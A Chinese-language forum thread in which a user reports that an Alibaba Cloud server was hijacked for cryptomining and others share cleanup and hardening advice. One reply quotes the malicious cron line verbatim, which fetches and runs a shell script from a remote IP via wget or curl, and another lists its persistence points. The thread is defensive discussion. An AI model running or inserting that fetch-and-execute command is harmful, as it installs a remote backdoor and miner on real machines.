太可怕了，第一次碰到，阿里云服务器被人侵入用来挖矿了。。。。

然后阿里云告诉我说，你当前账号用的是免费版云安全中心，不支持病毒查杀。。。。

不过可以看是哪些进程，kill 掉后删除就好了，我也被弄过

只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)

然后建议重装

果断重装，不要开放一些不用的端口，密码强度要设置高一些，定期对组件进行升级。

@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西

@Canglin 嗯，已经手动弄了，搜到了以前也有人被搞过

系统重新安装肯定的，SSH 只开启证书登录。

@bigxianyu 问下大佬们，IP 有举报功能吗 ， 感觉可以有这个功能，

@bigxianyu 我要举报这个 ip ，找到对应的
@bigxianyu 185.196.8.123 我要举报这个 IP , 感觉有点神奇，好像这个 IP 发生过好久了，我在 google 搜索都搜到了好几篇文章

@bigxianyu 类似骚扰电话功能

据我经验，50% 是 ssh 弱口令，30% 是 redis 弱口令，20% 是各种其他漏洞。

@bigxianyu #6 你是不是用过那种公共的 docker 镜像啊？我之前弄过一个 Oracle 和 MySql ，就被挖矿了

就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据

之前用 docker 远程部署镜像 端口有漏洞就被挖矿了 各种查定时文件什么的 清了还是会自动执行 就直接重装了

http://185.196.8.123/logservice.sh 这个文件做了好几个后门，systemd ，.bashrc ，cron ，都检查下

@oneisall8955 嗯嗯，是这三个

服务器直接作废 重新开一台吧，然后好好做好安全

阿里云这个回复，是真的让人心寒。

@Pierro #14 前天刚经历，一模一样😭

我上次是因为开启了 jdk 的远程调试

xmr 门罗币挖矿 我都遇到好多次了。清除了 没用。然后把脚本里面的文件权限改了也不行。会检测 xmrig 没有执行权限他会自动授权。我感觉那次不是 ssh 弱口令问题，我改了好几次密码都会回来，而且重启路由改变了 IP 没过多久还是会进来，可能是某个看起来正常的我还在用的服务有问题。最后重装系统才搞定。